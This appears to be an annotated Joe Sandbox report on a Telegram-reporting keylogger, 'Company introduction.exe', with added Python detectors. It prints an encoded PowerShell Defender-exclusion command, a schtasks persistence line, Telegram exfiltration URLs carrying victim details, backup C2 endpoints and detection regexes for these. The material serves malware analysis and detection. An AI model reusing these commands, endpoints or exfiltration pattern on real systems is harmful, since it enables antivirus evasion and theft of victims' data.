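# (AppData\Roaming\FzXKnGk.exe, Temp\tmpE629.tmp); every argument string is hypothetical.
SAMPLE_EVENTS = [
    ProcEvent(1000, 500, r"C:\Users\user\Desktop\Company introduction.exe",
              '"C:\\Users\\user\\Desktop\\Company introduction.exe"'),
    ProcEvent(1010, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -WindowStyle hidden -EncodedCommand "
              + _b64utf16(r"Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming")),
    ProcEvent(1020, 1000, r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp"'),
    ProcEvent(1030, 1000, r"C:\Users\user\Desktop\Company introduction.exe",
              '"C:\\Users\\user\\Desktop\\Company introduction.exe"'),
    ProcEvent(1040, 1010, r"C:\Windows\System32\conhost.exe", "conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(2000, 600, r"C:\Windows\explorer.exe", "explorer.exe"),  # benign control
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
MPPREF_RE = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.IGNORECASE)
EXCLUSION_RE = re.compile(r"-Exclusion(?:Path|Process|Extension)\b", re.IGNORECASE)
# schtasks /XML pointing at a .tmp file under the user's Temp directory
TEMP_XML_RE = re.compile(r'/XML\s+"?([^"\s]+\\AppData\\Local\\Temp\\[^"\s]+\.tmp)', re.IGNORECASE)


def decode_powershell_cmdline(cmdline: str) -> str:
    """Return the command line with any -EncodedCommand payload replaced by its decoded text."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline[:m.start(1)] + decoded + cmdline[m.end(1):]


def analyse(events):
    """Return (pid, rule) pairs for the three patterns in the report's process tree."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        exe = e.image.rsplit("\\", 1)[-1].lower()
        if exe == "powershell.exe":
            cmd = decode_powershell_cmdline(e.cmdline)
            if MPPREF_RE.search(cmd) and EXCLUSION_RE.search(cmd):
                how = "encoded" if cmd != e.cmdline else "plain"
                findings.append((e.pid, f"defender-exclusion-{how}"))
        elif exe == "schtasks.exe" and "/create" in e.cmdline.lower():
            if TEMP_XML_RE.search(e.cmdline):
                findings.append((e.pid, "schtasks-temp-xml"))
        parent = by_pid.get(e.ppid)
        # a process starting a second copy of its own image: injection/hollowing candidate
        if parent is not None and parent.image.lower() == e.image.lower():
            findings.append((e.pid, "self-spawn"))
    return findings


if __name__ == "__main__":
    for pid, rule in analyse(SAMPLE_EVENTS):
        print(pid, rule)
```

The self-spawn rule is deliberately weak on its own (browsers and installers do the same) and is only worth alerting on in combination with the other two, or when the parent is an unsigned binary in a user-writable directory as here. The base64 decode matters because the Sigma rule the report fired ("Powershell Base64 Encoded MpPreference Cmdlet") exists precisely because a plain string match on the command line misses the encoded form.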

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample
                Source | Detection | Scanner | Label | Link
                Company introduction.exe | 29% | Virustotal | | Browse
                Company introduction.exe | 34% | ReversingLabs | |
                Company introduction.exe | 100% | Avira | HEUR/AGEN.1311126 |
                Company introduction.exe | 100% | Joe Sandbox ML | |

                Dropped Files
                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Roaming\FzXKnGk.exe | 100% | Avira | HEUR/AGEN.1311126 |
                C:\Users\user\AppData\Roaming\FzXKnGk.exe | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Roaming\FzXKnGk.exe | 34% | ReversingLabs | |
                C:\Users\user\AppData\Roaming\FzXKnGk.exe | 29% | Virustotal | | Browse

                Unpacked PE Files: No Antivirus matches
                Domains: No Antivirus matches
                URLs: No Antivirus matches
                Contacted Domains
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                reallyfreegeoip.org | 104.21.48.1 | true | false | | high
                api.telegram.org | 149.154.167.220 | true | false | | high
                checkip.dyndns.com | 193.122.6.168 | true | false | | high
                checkip.dyndns.org | unknown | unknown | false | | high
                Contacted URLs
                Name | Malicious | Antivirus Detection | Reputation
                https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
                http://checkip.dyndns.org/ | false | | high
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2015/01/2025%20/%2014:34:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2015/01/2025%20/%2014:14:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high

                The bot token and chat_id in the two Telegram URLs are blanked in the report. URL-decoded, the text parameter is the keylogger's first-run beacon, one field per CRLF-separated line: "PC Name:302494", "Date and Time: 15/01/2025 / 14:34:14" (respectively 14:14:32), "Country Name: United States", and the fixed string "[ 302494 Clicked on the File If you see nothing this's mean the system storage's empty. ]". The country value comes from the reallyfreegeoip.org lookup of the public IP obtained from checkip.dyndns.org, which is why those two requests precede the Telegram call. Note that all three hosts are rated reputation "high" and malicious "false": none of them is a bad destination on its own, so this traffic is only detectable as a sequence, or as Telegram Bot API use from a non-browser process.
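Because the individual destinations are benign, the practical detection is the ordered sequence (checkip.dyndns.org, then reallyfreegeoip.org/xml/<ip>, then api.telegram.org/bot.../sendMessage) from one client, plus decoding of what the first beacon leaks. The following is an added example, not part of the Joe Sandbox report: it runs that sequence check over a few constructed proxy log lines and parses the Telegram message. The log format (timestamp, client, method, URL) and the client addresses are assumptions; the URLs are the ones listed above.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log: "<ISO timestamp> <client> <method> <url>". The URLs on client
# 10.0.0.7 are those from the report (bot token and chat_id blanked, as in the report);
# client 10.0.0.9 only checks its public IP, which is not by itself suspicious.
SAMPLE_LOG = """\
2025-01-15T14:14:30Z 10.0.0.7 GET http://checkip.dyndns.org/
2025-01-15T14:14:31Z 10.0.0.7 GET https://reallyfreegeoip.org/xml/8.46.123.189
2025-01-15T14:14:32Z 10.0.0.7 GET https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2015/01/2025%20/%2014:14:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
2025-01-15T14:20:00Z 10.0.0.9 GET http://checkip.dyndns.org/
2025-01-15T14:25:10Z 10.0.0.9 GET https://www.office.com/
"""

# The three stages, in the order the keylogger performs them.
STAGES = (
    ("checkip", re.compile(r"^https?://checkip\.dyndns\.(?:org|com)/", re.IGNORECASE)),
    ("geoip", re.compile(r"^https?://reallyfreegeoip\.org/xml/", re.IGNORECASE)),
    ("telegram", re.compile(r"^https://api\.telegram\.org/bot[^/]*/sendMessage", re.IGNORECASE)),
)


def parse_log(text):
    """Yield (timestamp, client, url) tuples from the constructed log format."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url = line.split(maxsplit=3)
        records.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), client, url))
    return records


def find_beacons(records, window=timedelta(minutes=5)):
    """Per client, look for checkip -> geoip -> telegram sendMessage within `window`."""
    by_client = defaultdict(list)
    for ts, client, url in records:
        by_client[client].append((ts, url))
    findings = []
    for client, hits in by_client.items():
        hits.sort()
        stage, start = 0, None
        for ts, url in hits:
            if start is not None and ts - start > window:   # too slow: restart the chain
                stage, start = 0, None
            if STAGES[stage][1].match(url):
                if stage == 0:
                    start = ts
                stage += 1
                if stage == len(STAGES):
                    findings.append({"client": client, "first_seen": start, "exfil_url": url})
                    stage, start = 0, None
    return findings


def decode_telegram_message(url):
    """Split a sendMessage URL into bot token, chat_id and the beacon fields it carries."""
    parts = urlsplit(url)
    m = re.match(r"/bot([^/]*)/sendMessage$", parts.path)
    if not m:
        return None
    q = parse_qs(parts.query, keep_blank_values=True)
    text = q.get("text", [""])[0]
    fields = {}
    for line in text.split("\r\n"):
        for key, label in (("pc_name", "PC Name:"), ("timestamp", "Date and Time:"),
                           ("country", "Country Name:")):
            if line.startswith(label):
                fields[key] = line[len(label):].strip()
    return {"bot_token": m.group(1) or None, "chat_id": q.get("chat_id", [""])[0] or None,
            "text": text, **fields}


if __name__ == "__main__":
    for hit in find_beacons(parse_log(SAMPLE_LOG)):
        print(hit["client"], hit["first_seen"], decode_telegram_message(hit["exfil_url"]))
```

When the token is not blanked, as it will be in real traffic, the bot_token field is the most useful pivot: it identifies the operator's bot across every victim that reports to it, and every later keystroke-log or credential upload from this family goes to the same bot. The sequence check should be run over TLS SNI or proxy CONNECT hostnames as well, since two of the three requests are HTTPS and only the hostname is visible without interception.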
                URLs from Memory and Binary Strings
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://www.fontbureau.com/designersG | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.fontbureau.com/designers/? | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.founder.com.cn/cn/bThe | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://api.telegram.org | Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://api.telegram.org/bot | Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp | false | | high
                http://www.fontbureau.com/designers? | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://www.office.com/lB | Company introduction.exe, 00000006.00000002.2941471703.0000000003291000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003532000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.tiro.com | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.fontbureau.com/designers | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | Company introduction.exe, 00000006.00000002.2950101107.0000000004449000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004373000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041F7000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041CF000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004326000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004470000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045C6000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.000000000344C000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000046E9000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004422000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004497000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004614000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.goodfont.co.kr | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://chrome.google.com/webstore?hl=en | FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003506000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://varders.kozow.com:8081 | Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp | false | | high
                http://www.sajatypeworks.com | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20a | Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.typography.netD | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.founder.com.cn/cn/cThe | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.galapagosdesign.com/staff/dennis.htm | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | Company introduction.exe, 00000006.00000002.2950101107.000000000415D000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004424000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041D2000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004301000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.000000000432C000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004188000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045CC000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000046C4000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004472000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004428000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000043FD000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://checkip.dyndns.org/q | Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp | false | | high
                https://chrome.google.com/webstore?hl=enlB | Company introduction.exe, 00000006.00000002.2941471703.0000000003260000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003501000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.galapagosdesign.com/DPlease | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.fonts.com | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.sandoll.co.kr | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.urwpp.deDPlease | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.zhongyicts.com.cn | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Company introduction.exe, 00000000.00000002.1732379162.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000000.00000002.1732379162.00000000034CF000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1756873041.0000000002998000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.sakkal.com | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://reallyfreegeoip.org/xml/ | Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030F2000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003392000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp | false | | high
                https://www.office.com/ | FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003537000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.000000000344C000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003528000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.apache.org/licenses/LICENSE-2.0 | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.fontbureau.com | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://checkip.dyndns.org | Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | Company introduction.exe, 00000006.00000002.2950101107.0000000004449000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004373000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041F7000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041CF000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004326000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004470000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045C6000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.000000000344C000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000046E9000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004422000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004497000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004614000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://api.telegram.org/bot/sendMessage?chat_id=&text= | Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.carterandcone.coml | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://aborters.duckdns.org:8081 | Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp | false | | high
                http://www.fontbureau.com/designers/cabarga.htmlN | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.founder.com.cn/cn | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.fontbureau.com/designers/frere-user.html | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://anotherarmy.dns.army:8081 | Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp | false | | high
                http://www.jiyu-kobo.co.jp/ | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://reallyfreegeoip.org/xml/8.46.123.189$ | Company introduction.exe, 00000006.00000002.2941471703.000000000311C000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.0000000003162000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003401000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://reallyfreegeoip.org | Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030F2000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.0000000003162000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003392000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003401000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.fontbureau.com/designers8 | Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | Company introduction.exe, 00000006.00000002.2950101107.000000000415D000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004424000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041D2000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004301000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.000000000432C000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004188000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045CC000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000046C4000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004472000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004428000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000043FD000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp | false | | high

                Most of the fontbureau.com, founder.com.cn, tiro.com and similar entries (including the ones with stray trailing characters such as "designersG" or "DPlease") are font-licensing strings from embedded font resources, not network indicators. The four port-8081 entries (varders.kozow.com:8081, aborters.duckdns.org:8081, anotherarmy.dns.army:8081 and http://51.38.247.67:8081/_send_.php) appear in memory across both the original sample and the dropped FzXKnGk.exe but are absent from the contacted-domain and contacted-IP lists: during this run the sample used only the Telegram channel, so these are configuration-borne alternative C2 endpoints worth blocking and hunting for, not observed traffic.
                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs
                Contacted Public IPs
                IP | Domain | Country | ASN | ASN Name | Malicious
                104.21.48.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
                149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
                193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1591636
Start date and time: 2025-01-15 08:38:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Company introduction.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@18/11@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 183
• Number of non-executed functions: 33
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.245.163.56, 13.107.253.45
